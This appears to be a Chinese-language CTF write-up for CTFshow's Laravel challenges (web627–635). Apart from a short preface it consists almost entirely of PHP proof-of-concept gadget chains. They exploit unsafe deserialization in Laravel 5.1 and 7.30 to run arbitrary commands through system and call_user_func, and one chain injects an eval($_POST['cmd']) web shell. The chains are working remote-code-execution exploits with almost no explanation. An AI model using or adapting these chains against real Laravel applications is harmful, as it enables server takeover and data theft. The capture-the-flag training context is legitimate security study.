题目地址:https://ctf.show/challenges
前言:
好久没学习了,继续更新,学无止境,此系列为CTFshow的Laravel专题,主要为Laravel框架的一些漏洞及POC,自9.1新网络安全法更新以来,也不敢提供完整的复现漏洞啥的,只总结一些相关的POC,以及自己的学习经历,这里总结的也许也并不会有那么完整,只能说是笔者自己尽量的把自己所学所找的东西记录下来
web627
Laravel5.1 反序列化RCE
Laravel框架在网上公开的链子并没有5.1的,所以得自己挖
poc:
<?php
namespace{
use Mockery\Generator\DefinedTargetClass;
class Swift_KeyCache_DiskKeyCache{
private $_keys=['bit'=>array('bit'=>'bit')];
private $_path;
public function __construct($cmd){
$this->_path=new DefinedTargetClass($cmd);
}
}
echo urlencode(serialize(new Swift_KeyCache_DiskKeyCache($argv[1])));
}
namespace Mockery\Generator{
use Faker\ValidGenerator;
class DefinedTargetClass
{
private $rfc;
public function __construct($cmd)
{
$this->rfc=new ValidGenerator($cmd);
}
}
}
namespace Faker{
class DefaultGenerator{
protected $default;
public function __construct($cmd)
{
$this->default = $cmd;
}
}
class ValidGenerator
{
protected $generator;
protected $validator;
protected $maxRetries;
public function __construct($cmd){
$this->generator=new DefaultGenerator($cmd);
$this->maxRetries=9;
$this->validator='system';
}
}
}
?>
web628
Laravel5.1 反序列化RCE
RCE 姿势2
poc:
<?php
namespace{
use phpDocumentor\Reflection\DocBlock\Tags\Deprecated;
class Swift_KeyCache_DiskKeyCache{
private $_keys=['bit'=>array('bit'=>'bit')];
private $_path;
public function __construct($cmd){
$this->_path=new Deprecated($cmd);
}
}
echo urlencode(serialize(new Swift_KeyCache_DiskKeyCache($argv[1])));
}
namespace phpDocumentor\Reflection\DocBlock\Tags{
use Illuminate\Database\DatabaseManager;
abstract class BaseTag{
protected $description;
}
final class Deprecated extends BaseTag{
public function __construct($cmd){
$this->description=new DatabaseManager($cmd);
}
}
}
namespace Illuminate\Database{
class DatabaseManager{
protected $app;
protected $extensions ;
public function __construct($cmd)
{
$this->app['config']['database.default']=$cmd;
$this->app['config']['database.connections']=array($cmd=>'system');
$this->extensions[$cmd]='call_user_func';
}
}
}
?>
web629-630
Laravel5.1 反序列化RCE
RCE 姿势3-4
poc:
<?php
namespace{
use Prophecy\Argument\Token\ObjectStateToken;
class Swift_KeyCache_DiskKeyCache{
private $_keys=['bit'=>array('bit'=>'bit')];
private $_path;
public function __construct($cmd){
$this->_path=new ObjectStateToken($cmd);
}
}
echo urlencode(serialize(new Swift_KeyCache_DiskKeyCache($argv[1])));
}
namespace Prophecy\Argument\Token{
use Mockery\Generator\MockDefinition;
use Illuminate\Validation\Validator;
class ObjectStateToken{
private $name;
private $value;
private $util;
public function __construct($cmd){
$this->name='bit';
$this->value=new MockDefinition($cmd);
$this->util=new Validator();
}
}
}
namespace Illuminate\Validation{
use Faker\DefaultGenerator;
class Validator{
protected $container;
protected $extensions = [];
public function __construct(){
$this->extensions['y']='xxx@load';
$this->container=new DefaultGenerator();
}
}
}
namespace Faker{
use Mockery\Loader\EvalLoader;
class DefaultGenerator
{
protected $default;
public function __construct()
{
$this->default = new EvalLoader();
}
}
}
namespace Mockery\Loader{
class EvalLoader{}
}
namespace Mockery\Generator{
use Illuminate\Session\Store;
class MockDefinition{
protected $config;
protected $code;
public function __construct($cmd){
$this->config=new Store();
$this->code=$cmd;
}
}
}
namespace Illuminate\Session{
class Store{
protected $name='bit';//类不存在就行
}
}
?>
web631-634
Laravel7.30 反序列化RCE
RCE 姿势1-4
poc:
<?php
namespace Illuminate\Routing{
use Illuminate\Validation\Validator;
class PendingResourceRegistration
{
protected $registrar;
protected $registered = false;
protected $name='call_user_func';
protected $controller='system';
protected $options;
public function __construct($cmd){
$this->registrar=new Validator();
$this->options=$cmd;
}
}
echo urlencode(serialize(new PendingResourceRegistration($argv[1])));
}
namespace Illuminate\Validation{
class Validator{
public $extensions = [];
public function __construct(){
$this->extensions['']='call_user_func';
}
}
}
?>
web635
Laravel7.30 反序列化RCE
RCE 姿势5
poc:
<?php
namespace Illuminate\Routing{
use Illuminate\View\InvokableComponentVariable;
class PendingResourceRegistration
{
protected $registrar;
protected $registered = false;
public function __construct(){
$this->registrar=new InvokableComponentVariable();
}
}
echo urlencode(serialize(new PendingResourceRegistration()));
}
namespace Illuminate\View{
use PHPUnit\Framework\MockObject\MockClass;
class InvokableComponentVariable{
protected $callable;
public function __construct(){
$this->callable=array(new MockClass(),'generate');
}
}
}
namespace PHPUnit\Framework\MockObject{
class MockClass{
private $classCode;
private $mockName;
private $configurableMethods;
public function __construct(){
$this->classCode='eval($_POST["cmd"]);';
$this->mockName='bit';
$this->configurableMethods='bit';
}
}
}